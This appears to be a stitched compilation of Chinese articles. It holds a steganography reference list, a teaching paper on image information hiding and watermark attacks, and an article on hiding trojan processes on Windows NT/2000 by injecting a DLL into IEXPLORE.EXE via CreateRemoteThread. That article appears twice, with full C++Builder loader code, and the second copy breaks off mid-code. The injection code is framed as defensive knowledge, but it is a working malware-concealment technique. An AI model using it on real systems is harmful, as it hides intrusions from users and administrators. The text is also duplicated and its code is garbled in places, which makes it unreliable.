[3]劉文彬，劉九芬.一種針對LSB替換隱寫的消息定位方法[J].信息工程大學(xué)學(xué)報，2013，14（6）：641-646.

[4] R. Cogranne， C. Zitzmann， F. Retraint，et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In： Proceedings of the 14th International Conference on Information Hiding，2013.

[5] J. Fridrich， J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In： Proceedings of the 14th International Conference on Information Hiding， 2013.

[6] 張焱，張敏情，甕佳佳.基于直方圖對的大容量信息隱藏算法[J].計算機應(yīng)用研究，2013，30（7）：2108-2111.

[7] 趙彥濤，李志全，董宇青.基于排序和直方圖修改的可逆信息隱藏方法[J].光電子.激光，2010，2（1）：102-106.

[8] 楊春芳，劉粉林，羅向陽.基于相對熵的直方圖差異與JPEG隱寫的定量分析[J].計算機研究與發(fā)展， 2011，48（8）：1563-1569.

[9] 熊志勇，王江晴.基于差分直方圖平移的彩色圖像可逆信息隱藏[J].四川大學(xué)學(xué)報，2011，43（3）： 81-89.

[10] Z.H. Wang， C.F. Lee， C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software， 2013，86（2）： 315-323.

[11] X.L. Li， J. Li， B. Li， et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing，2013， 93（1）： 198C205.

[12] X.T. Wang， C.C. Chang， T.S. Nguyen， et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing， 2013，23（2）： 569C577.

[13] Nabin Ghoshal， Anirban Goswami， H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In： Proceedings of the International Conference on Frontiers of Intelligent Computing： Theory and Applications （FICTA），2013.

[14]和紅杰，張家樹.對水印信息篡改魯棒的自嵌入水印算法[J].軟件學(xué)報，2009，20（2）：437-450.

[15] 唐燕，閭國年，殷奎喜.規(guī)范類正交矩陣的信息隱藏算法[J].東南大學(xué)學(xué)報，2013，43（1）：45-49.

[16] T. Zhang， D.J. Mu， S. Ren， et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology （IC-BNMT2010），2010.

[17] T. Zhang， D.J. Mu， S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences，2013， 7（5）： 1803-1807.

[18] H.B. Kekre， P. Halarnkar， K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science，2011， 145（1）： 190-194.

[19] 奚玲，平西建，張韜.整數(shù)小波域濕紙碼自適應(yīng)信息隱藏算法[J].計算機輔助設(shè)計與圖形學(xué)學(xué)報，2011，2（7）：1217-1223.

[20] H. Zhao， H.X. Wang， M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing， 2011，91（11）： 2595-2605.

[21] A. Lamgunde， A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science， 2011，125（2）： 364-371.

[22] Y.J. Qiu， H. T. Lu， N. Deng， et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing， Information and Control（ICCIC 2011），2011.

[23] L.H. Tian， N.N. Zheng， J.R. Xue， et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing：Image Communication，2011，31（2）： 9-64.

[24] 任帥，張|，慕德俊，等.基于GHM多小波與自適應(yīng)顏色遷移的信息隱藏算法研究[J].西北工業(yè)大學(xué)學(xué)報，2010，28（2）：64-269.

[25] 潘志庚， 孫樹森， 李黎.三維模型數(shù)字水印綜述[J].計算機輔助設(shè)計與圖形學(xué)學(xué)報，2006，18（8）：1103-1110.

[26] S.H. Lee， K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design，2011，43（8）： 1056-1073.

[27] M. Luo， A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing， 2011，20（10）： 2813-2826.

[28] L. Du， X.C. Cao， M.H. Zhang， et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In： Proceedings of the 14th International Conference on Information Hiding，2013.

[29] Z.Q. Yao， R.J. Pan， F.H. Li， et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics， 2010，19（4）： 651-655.

[30] S. Cai， X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia， 2011，6（1）： 83-90.

[31] S. Cai， X.K. Shen. OTP-W：Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science，2010.

[32] 廖學(xué)良，王屏.一種新的三維模型水印嵌入空域算法[J]. 計算機學(xué)報，2008， 31（10）： 1848-1856.

[33] K. Wang， G. Lavouéa， F. Denisb， A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics，2011， 35（1）： 1-19.

[34] I.L. Chung， C.M. Chou， D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing， Information and Control，2011， 7（6）： 3419-3435.

[35] 胡敏，劉輝.基于特征點的自適應(yīng)三維網(wǎng)格數(shù)字水印算法[J].合肥工業(yè)大學(xué)學(xué)報（自然科學(xué)版），2010，33（1）：55-59.

[36] M. Hachani， A.Z. Ouled， S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing（ICIP），2012.

[37] Y.P. Wang， S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design， 2010，27（5）： 395-404.

[38]陳力為. 中文信息處理叢書序言[M].北京：清華大學(xué)出版社，2000.

[39]俞士汶，朱學(xué)鋒，賈玉祥. 漢語隱喻自動處理研究之概況[C].第四屆文學(xué)與信息技術(shù)國際研討會，2008.

[40] 譚良，吳波，劉震，等.一種基于混沌和小波變換的大容量音頻信息隱藏算法[J].電子學(xué)報，2010，38（8）：1812-1819.

[41] 丁瑋，閆偉齊，齊東旭.基于置亂與融合的數(shù)字圖象隱藏技術(shù)及其應(yīng)用[J].中國圖象圖形學(xué)報，2000，5（8）：644-649.

[42] 田云凱，賈傳熒，王慶武.基于Arnold變換的圖像置亂及其恢復(fù)[J].大連海事大學(xué)學(xué)報：自然科學(xué)版，2006，32（4）：107-109.

[43] 彭萬權(quán)，張承暢，馮文江，等.多階幻方卷積碼的構(gòu)造及譯碼[J].電子學(xué)報，2013，41（1）：123-130.

篇（4）

隨著網(wǎng)絡(luò)中信息安全事件的不斷升溫，網(wǎng)絡(luò)安全教育也越來越受到高校重視。各大高校紛紛開設(shè)該類課程。本校計算機科學(xué)與技術(shù)、信息工程等專業(yè)都相繼開設(shè)《網(wǎng)絡(luò)與信息安全》、《信息安全》、《信息安全技術(shù)》等課程，普及網(wǎng)絡(luò)安全知識，提高學(xué)生的網(wǎng)絡(luò)安全技能，增加網(wǎng)絡(luò)安全意識。以《網(wǎng)絡(luò)與信息安全》課程為例，課程分配學(xué)分為4.0，采用“2+2”模式教學(xué)，其中理論2.0為課堂教學(xué)和課堂討論課時，實驗2.0為實驗課時，即每周理論2節(jié)課，單周理論課時，雙周討論課，實驗課每周2節(jié)課。該課程的體系結(jié)構(gòu)如圖1所示。[1，2]

教學(xué)過程中的基礎(chǔ)內(nèi)容

《網(wǎng)絡(luò)與信息安全》課程分為三大模塊：①網(wǎng)絡(luò)安全基本知識概述。該模塊主要講述了網(wǎng)絡(luò)安全的發(fā)展和現(xiàn)狀問題，列舉網(wǎng)絡(luò)安全問題引發(fā)的各種不同影響的案例。②網(wǎng)絡(luò)攻擊技術(shù)。該模塊主要講述網(wǎng)絡(luò)中的一些攻擊現(xiàn)象、攻擊行為以及攻擊工具等。③密碼學(xué)模塊。該模塊主要講述古典密碼學(xué)和現(xiàn)代密碼學(xué)的一些應(yīng)用，以及信息隱藏技術(shù)的一些實際作用等。④網(wǎng)絡(luò)防護技術(shù)。該模塊主要講述網(wǎng)絡(luò)中針對安全的一些防護措施，如防火墻、入侵監(jiān)測系統(tǒng)等。

以信息隱藏技術(shù)為例，該部分內(nèi)容在整個課程中非常重要，它將一些保密或重要的信息隱藏到另外一個可以公開的媒體之中，如把指定的信息隱藏于數(shù)字化的圖像、聲音或文本當(dāng)中，充分利用人們的“所見即所得”的心理，來迷惑惡意的攻擊者。近幾年來，信息隱藏技術(shù)不斷發(fā)展，越來越多地應(yīng)用在生活中，如隱寫術(shù)、數(shù)字水印、數(shù)字指紋、隱藏信道、閾下信道、低截獲概率和匿名通信等，是目前較熱的話題。[3，4]

在課程中這部分內(nèi)容是整個課程的重點、難點之一，教學(xué)過程采用了比較、舉例等方法，課時分配――理論教學(xué)：討論：實驗=1：1：2，理論講授以圖1中的知識框架為主線，算法原理及實現(xiàn)方法，討論和實驗結(jié)合中軟吉大的網(wǎng)絡(luò)信息安全系統(tǒng)進行教學(xué)。綜合起來可以把這部分內(nèi)容分為以下幾部分。

1.信息隱藏位圖法

位圖法目前使用越來越少，但作為一種基礎(chǔ)信息隱藏方法，仍有較高的教學(xué)應(yīng)用價值。該方法作為課程中的一個基本知識點，要求學(xué)生掌握它的基本原理，并能通過一個案例，掌握主要運算過程如下：

例如，一幅24位BMP圖像，文件頭和圖像數(shù)據(jù)由54字節(jié)組成，文件頭不能隱藏信息，從第55字節(jié)開始為圖像數(shù)據(jù)部分，這部分可以隱藏信息。圖像數(shù)據(jù)部分是由一系列的8位二進制數(shù)所組成，因為每個8位二進制數(shù)中“1”的個數(shù)只有奇數(shù)或偶數(shù)兩種可能性，因此若一個字節(jié)中“1”的個數(shù)為奇數(shù)，則稱該字節(jié)為奇性字節(jié)，用“1”表示；若一個字節(jié)中“1”的個數(shù)為偶數(shù)，則稱該字節(jié)為偶性字節(jié)，用“0”表示。我們用每個字節(jié)的奇偶性來表示隱藏的信息。

設(shè)一段24位BMP文件的數(shù)據(jù)為：01100110，00111100，10001111，00011010，00000000，10101011，00111110，10110000，則其字節(jié)的奇偶排序為：0，0，1，1，0，1，1，1.現(xiàn)在需要隱藏16進制信息4F，由于4F轉(zhuǎn)化為8位二進制為01001111，將這兩個數(shù)列相比較，發(fā)現(xiàn)第2，3，4，5位不一致，于是對這段24位BMP文件數(shù)據(jù)的某些字節(jié)的奇偶性進行調(diào)制，使其與4F轉(zhuǎn)化的8位二進制相一致：第2位：將00111100變?yōu)?0111101，則該字節(jié)由偶變?yōu)槠?；?位：將10001111變?yōu)?0001110，則該字節(jié)由奇變?yōu)榕?；?位：將00011010變?yōu)?0011011，則該字節(jié)由奇變?yōu)榕?；?位：將00000000變?yōu)?0000001，則該字節(jié)由偶變?yōu)槠妗?/p>

經(jīng)過變化，8個字節(jié)便隱藏了一個字節(jié)的信息，這樣就能很好地將信息隱藏在位圖中了。當(dāng)然逆向提取隱藏信息需要花費更長的時間。

2.LSB水印提取

LSB（最低有效位）算法是在位圖法的基礎(chǔ)上將輸入的信號打亂，并按照一定的分配規(guī)則使嵌入的信息能夠散布于圖像的所有像素點上，增加破壞和修改水印的難度。水印信號嵌入模型如圖2，水印信號檢測模型如圖3。

3.DCT變換域算法

DCT變換域算法是這一類算法的總稱，在它下面的具體的算法會有一些不同。下面介紹一種基于模運算的數(shù)字水印算法。該方法將水印作為二值圖像（每一像元只有兩種可能的數(shù)值或者灰度等級狀態(tài)的圖像）進行處理，依據(jù)圖像在進行DCT變換后系數(shù)的統(tǒng)計來選取適當(dāng)?shù)拈撝担ㄟ^模處理加入水印。此算法的特點是在水印檢測時不需要原始圖像（如圖4）。

模擬主動水印攻擊教學(xué)過程

通過基礎(chǔ)知識的學(xué)習(xí)，學(xué)生對信息隱藏技術(shù)已經(jīng)有了一定的了解，為了加深記憶，使知識應(yīng)用得更好，在這部分課程最后增加了一個模擬主動水印攻擊的教學(xué)模塊。該模塊主要應(yīng)用前期的知識完成。常見的水印攻擊方法有：移去攻擊、幾何攻擊、密碼攻擊、協(xié)議攻擊（如圖5）。

通過模擬攻擊實驗，學(xué)生對數(shù)字隱藏技術(shù)有了更深的了解，對各種算法增加了興趣。并在課堂上針對結(jié)果展開討論。下頁圖6為實驗?zāi)M攻擊后的有效結(jié)果之一。

選用LSB或者DCT進行水印攻擊，測試可以顯示如下頁圖6效果。

教學(xué)成效

通過對課程中信息隱藏技術(shù)教學(xué)的改進，學(xué)生對比較難懂的數(shù)字水印部分內(nèi)容有了更深一步的了解。通過改革，不僅充分調(diào)動了學(xué)生的積極性，培養(yǎng)了自學(xué)能力，開發(fā)了創(chuàng)新能力，還鍛煉了學(xué)生的團隊合作意識和實踐能力。攻擊中涉及算法的選擇、操作的選擇、速度的快慢，學(xué)生都能通過團隊合作完成。學(xué)生在實踐過程中強烈感受到了成功感和自信感。

結(jié)束語

本文以信息隱藏技術(shù)內(nèi)容教學(xué)為例，闡述了三種不同的信息隱藏技術(shù)的基本知識點，分析了它們之間的關(guān)聯(lián)性和區(qū)別，提高了學(xué)生的團隊合作能力和創(chuàng)新思維的培養(yǎng)，加強了學(xué)生的學(xué)習(xí)興趣。此外，本模式將教學(xué)與科研能力培養(yǎng)相融合，更多地引發(fā)了學(xué)生的思考。該教學(xué)模式可推廣到其他課程中。

參考文獻(xiàn)：

[1]李繼芳，奚李峰，董晨.IPR―CDIO環(huán)境的計算機工程教育研究[J].計算機教育，2009（18）.

[2]李繼芳，奚李峰，殷偉鳳，高昆.基于合作式學(xué)習(xí)的計算機導(dǎo)論課程教學(xué)[J].計算機教育，2008（10）.

篇（5）

關(guān)鍵字進程線程木馬動態(tài)鏈接庫

木馬程序(也稱后門程序)是能被控制的運行在遠(yuǎn)程主機上的程序，由于木馬程序是運行在遠(yuǎn)程主機上，所以進程的隱藏?zé)o疑是大家關(guān)心的焦點。

本文分析了WindowsNT/2000系統(tǒng)下進程隱藏的基本技術(shù)和方法，并著重討論運用線程嫁接技術(shù)如何實現(xiàn)WindowsNT/2000系統(tǒng)中進程的隱藏。

1基本原理

在WIN95/98中，只需要將進程注冊為系統(tǒng)服務(wù)就能夠從進程查看器中隱形，可是這一切在WindowsNT/2000中卻完全不同，無論木馬從端口、啟動文件上如何巧妙地隱藏自己，始終都不能躲過WindowsNT/2000的任務(wù)管理器，WindowsNT/2000的任務(wù)管理器均能輕松顯示出木馬進程，難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了？我們知道，在WINDOWS系統(tǒng)下，可執(zhí)行文件主要是Exe和Com文件，這兩種文件在運行時都有一個共同點，會生成一個獨立的進程，尋找特定進程是我們發(fā)現(xiàn)木馬的方法之一，隨著入侵檢測軟件的不斷發(fā)展，關(guān)聯(lián)進程和SOCKET已經(jīng)成為流行的技術(shù)，假設(shè)一個木馬在運行時被檢測軟件同時查出端口和進程，我們基本上認(rèn)為這個木馬的隱藏已經(jīng)完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統(tǒng)管理員來說都是可見的，要想做到木馬的進程隱藏，有兩個辦法，第一是讓系統(tǒng)管理員看不見你的進程；第二是不使用進程。本文以第二種方法為例加以討論，其基本原理是將自已的木馬以線程方式嫁接于遠(yuǎn)程進程之中，遠(yuǎn)程進程則是合法的用戶程序，這樣用戶管理者看到的只是合法進程，而無法發(fā)現(xiàn)木馬線程的存在，從而達(dá)到隱藏的目的。

2實現(xiàn)方法

為了弄清實現(xiàn)方法，我們必須首先了解Windows系統(tǒng)的另一種"可執(zhí)行文件"----DLL，DLL是DynamicLinkLibrary（動態(tài)鏈接庫）的縮寫，DLL文件是Windows的基礎(chǔ)，因為所有的API函數(shù)都是在DLL中實現(xiàn)的。DLL文件沒有程序邏輯，是由多個功能函數(shù)構(gòu)成，它并不能獨立運行，一般都是由進程加載并調(diào)用的。因為DLL文件不能獨立運行，所以在進程列表中并不會出現(xiàn)DLL，假設(shè)我們編寫了一個木馬DLL，并且通過別的進程來運行它，那么無論是入侵檢測軟件還是進程列表中，都只會出現(xiàn)那個進程而并不會出現(xiàn)木馬DLL，如果那個進程是可信進程，（例如瀏覽器程序IEXPLORE.EXE，沒人會懷疑它是木馬吧？）那么我們編寫的DLL作為那個進程的一部分，也將成為被信賴的一員，也就達(dá)到了隱藏的目的。

運行DLL方法有多種，但其中最隱蔽的方法是采用動態(tài)嵌入技術(shù)，動態(tài)嵌入技術(shù)指的是將自己的代碼嵌入正在運行的進程中的技術(shù)。理論上來說，在Windows中的每個進程都有自己的私有內(nèi)存空間，別的進程是不允許對這個私有空間進行操作的，但是實際上，我們?nèi)匀豢梢岳梅N種方法進入并操作進程的私有內(nèi)存。動態(tài)嵌入技術(shù)有多種如：窗口Hook、掛接API、遠(yuǎn)程線程等，這里介紹一下遠(yuǎn)程線程技術(shù)，它只要有基本的進線程和動態(tài)鏈接庫的知識就可以很輕松地完成動態(tài)嵌入。

遠(yuǎn)程線程技術(shù)指的是通過在另一個進程中創(chuàng)建遠(yuǎn)程線程的方法進入那個進程的內(nèi)存地址空間。我們知道，在進程中，可以通過CreateThread函數(shù)創(chuàng)建線程，被創(chuàng)建的新線程與主線程（就是進程啟動時被同時自動建立的那個線程）共享地址空間以及其他的資源。但是很少有人知道，通過CreateRemoteThread也同樣可以在另一個進程內(nèi)創(chuàng)建新線程，被創(chuàng)建的遠(yuǎn)程線程同樣可以共享遠(yuǎn)程進程（是遠(yuǎn)程進程）的地址空間，所以，實際上，我們通過一個遠(yuǎn)程線程，進入了遠(yuǎn)程進程的內(nèi)存地址空間，也就擁有了那個遠(yuǎn)程進程相當(dāng)?shù)臋?quán)限。

3實施步驟

1）用Process32Next（）函數(shù)找到宿主進程,獲取宿主進程ID,并用

OpenProcess（）函數(shù)打開宿主進程。

2）用VirtualAllocEx（）函數(shù)分配遠(yuǎn)程進程地址空間中的

內(nèi)存。

3）用WriteProcessMemory（）函數(shù)將待隱藏的DLL的路徑名。

4）拷貝到步驟二已經(jīng)分配的內(nèi)存中。

5）用GetProcAddress（）函數(shù)獲取LoadlibraryA（）函數(shù)的實地址（在kernel32.dll中）。

6）用CreateRemoteThread（）函數(shù)在遠(yuǎn)程進程中創(chuàng)建一個線程。

7）它調(diào)用正確的LoadlibraryA（）函數(shù)。

8）為它傳遞步驟二中分配的內(nèi)存地址。

4具體實例

下面是在C++Builder4.0環(huán)境下編寫的運用遠(yuǎn)程線程技術(shù)隱藏木馬的程序代碼：

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數(shù)

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隱藏的DLL文件名

HANDLEhProcessSnap=NULL;//進程快照句柄

HANDLEhRemoteProcess;//遠(yuǎn)程進程句柄

LPVOIDpszLibFileRemote;//遠(yuǎn)程進程中分配給文件名的空間

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放遠(yuǎn)程線程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打開進程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失敗返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//獲取第一個進程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主進程，以IEXPLORE.EXE為例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程

}

else

{

MessageBox(NULL,"取第一個進程失敗","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打開遠(yuǎn)程進程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假設(shè)hide.dll是待隱藏的進程

intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申請存放文件名的空間

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名寫入申請的空間

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//獲取動態(tài)鏈接庫函數(shù)地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//創(chuàng)建遠(yuǎn)程線

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//關(guān)閉遠(yuǎn)程線程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//關(guān)閉進程快照

}

該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。

至此，遠(yuǎn)程嵌入順利完成，為了試驗我們的hide.dll是不是已經(jīng)正常地在遠(yuǎn)程線程運行，我同樣在C++Builder4.0環(huán)境下編寫并編譯了下面的hide.dll作為測試：

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//獲取當(dāng)前進程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

當(dāng)使用RmtDll.exe程序?qū)⑦@個hide.dll嵌入IEXPLORE.EXE進程后假設(shè)PID=1208），該測試DLL彈出了1208字樣的確認(rèn)框，同時使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

這證明hide.dll已經(jīng)在IEXPLORE.EXE進程內(nèi)正確地運行了。上面程序的頭文件由編譯器自動生成，未作改動，故略之。

5結(jié)束語

進程隱藏技術(shù)和方法有很多，而且這一技術(shù)發(fā)展也相當(dāng)快，本文僅從一個側(cè)面加以討論，希望通過這一探討讓我們對進程隱藏技術(shù)有一個更清楚的認(rèn)識，同時也為我們防范他人利用進程隱藏手段非法入侵提供參考，本文拋磚引玉，不當(dāng)之處誠懇批評指正。

篇（6）

關(guān)鍵字進程線程木馬動態(tài)鏈接庫

木馬程序(也稱后門程序)是能被控制的運行在遠(yuǎn)程主機上的程序，由于木馬程序是運行在遠(yuǎn)程主機上，所以進程的隱藏?zé)o疑是大家關(guān)心的焦點。

本文分析了WindowsNT/2000系統(tǒng)下進程隱藏的基本技術(shù)和方法，并著重討論運用線程嫁接技術(shù)如何實現(xiàn)WindowsNT/2000系統(tǒng)中進程的隱藏。

1基本原理

在WIN95/98中，只需要將進程注冊為系統(tǒng)服務(wù)就能夠從進程查看器中隱形，可是這一切在WindowsNT/2000中卻完全不同，無論木馬從端口、啟動文件上如何巧妙地隱藏自己，始終都不能躲過WindowsNT/2000的任務(wù)管理器，WindowsNT/2000的任務(wù)管理器均能輕松顯示出木馬進程，難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了？我們知道，在WINDOWS系統(tǒng)下，可執(zhí)行文件主要是Exe和Com文件，這兩種文件在運行時都有一個共同點，會生成一個獨立的進程，尋找特定進程是我們發(fā)現(xiàn)木馬的方法之一，隨著入侵檢測軟件的不斷發(fā)展，關(guān)聯(lián)進程和SOCKET已經(jīng)成為流行的技術(shù)，假設(shè)一個木馬在運行時被檢測軟件同時查出端口和進程，我們基本上認(rèn)為這個木馬的隱藏已經(jīng)完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統(tǒng)管理員來說都是可見的，要想做到木馬的進程隱藏，有兩個辦法，第一是讓系統(tǒng)管理員看不見你的進程；第二是不使用進程。本文以第二種方法為例加以討論，其基本原理是將自已的木馬以線程方式嫁接于遠(yuǎn)程進程之中，遠(yuǎn)程進程則是合法的用戶程序，這樣用戶管理者看到的只是合法進程，而無法發(fā)現(xiàn)木馬線程的存在，從而達(dá)到隱藏的目的。

2實現(xiàn)方法

為了弄清實現(xiàn)方法，我們必須首先了解Windows系統(tǒng)的另一種"可執(zhí)行文件"----DLL，DLL是DynamicLinkLibrary（動態(tài)鏈接庫）的縮寫，DLL文件是Windows的基礎(chǔ)，因為所有的API函數(shù)都是在DLL中實現(xiàn)的。DLL文件沒有程序邏輯，是由多個功能函數(shù)構(gòu)成，它并不能獨立運行，一般都是由進程加載并調(diào)用的。因為DLL文件不能獨立運行，所以在進程列表中并不會出現(xiàn)DLL，假設(shè)我們編寫了一個木馬DLL，并且通過別的進程來運行它，那么無論是入侵檢測軟件還是進程列表中，都只會出現(xiàn)那個進程而并不會出現(xiàn)木馬DLL，如果那個進程是可信進程，（例如瀏覽器程序IEXPLORE.EXE，沒人會懷疑它是木馬吧？）那么我們編寫的DLL作為那個進程的一部分，也將成為被信賴的一員，也就達(dá)到了隱藏的目的。

運行DLL方法有多種，但其中最隱蔽的方法是采用動態(tài)嵌入技術(shù)，動態(tài)嵌入技術(shù)指的是將自己的代碼嵌入正在運行的進程中的技術(shù)。理論上來說，在Windows中的每個進程都有自己的私有內(nèi)存空間，別的進程是不允許對這個私有空間進行操作的，但是實際上，我們?nèi)匀豢梢岳梅N種方法進入并操作進程的私有內(nèi)存。動態(tài)嵌入技術(shù)有多種如：窗口Hook、掛接API、遠(yuǎn)程線程等，這里介紹一下遠(yuǎn)程線程技術(shù)，它只要有基本的進線程和動態(tài)鏈接庫的知識就可以很輕松地完成動態(tài)嵌入。

遠(yuǎn)程線程技術(shù)指的是通過在另一個進程中創(chuàng)建遠(yuǎn)程線程的方法進入那個進程的內(nèi)存地址空間。我們知道，在進程中，可以通過CreateThread函數(shù)創(chuàng)建線程，被創(chuàng)建的新線程與主線程（就是進程啟動時被同時自動建立的那個線程）共享地址空間以及其他的資源。但是很少有人知道，通過CreateRemoteThread也同樣可以在另一個進程內(nèi)創(chuàng)建新線程，被創(chuàng)建的遠(yuǎn)程線程同樣可以共享遠(yuǎn)程進程（是遠(yuǎn)程進程）的地址空間，所以，實際上，我們通過一個遠(yuǎn)程線程，進入了遠(yuǎn)程進程的內(nèi)存地址空間，也就擁有了那個遠(yuǎn)程進程相當(dāng)?shù)臋?quán)限。

3實施步驟

1）用Process32Next（）函數(shù)找到宿主進程,獲取宿主進程ID,并用

OpenProcess（）函數(shù)打開宿主進程。

2）用VirtualAllocEx（）函數(shù)分配遠(yuǎn)程進程地址空間中的

內(nèi)存。

3）用WriteProcessMemory（）函數(shù)將待隱藏的DLL的路徑名。

4）拷貝到步驟二已經(jīng)分配的內(nèi)存中。

5）用GetProcAddress（）函數(shù)獲取LoadlibraryA（）函數(shù)的實地址（在kernel32.dll中）。

6）用CreateRemoteThread（）函數(shù)在遠(yuǎn)程進程中創(chuàng)建一個線程。

7）它調(diào)用正確的LoadlibraryA（）函數(shù)。

8）為它傳遞步驟二中分配的內(nèi)存地址。

4具體實例

下面是在C++Builder4.0環(huán)境下編寫的運用遠(yuǎn)程線程技術(shù)隱藏木馬的程序代碼：

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數(shù)

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隱藏的DLL文件名

HANDLEhProcessSnap=NULL;//進程快照句柄

HANDLEhRemoteProcess;//遠(yuǎn)程進程句柄

LPVOIDpszLibFileRemote;//遠(yuǎn)程進程中分配給文件名的空間

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放遠(yuǎn)程線程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打開進程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失敗返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//獲取第一個進程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主進程，以IEXPLORE.EXE為例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程

}

else

{

MessageBox(NULL,"取第一個進程失敗","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打開遠(yuǎn)程進程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假設(shè)hide.dll是待隱藏的進程

intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申請存放文件名的空間

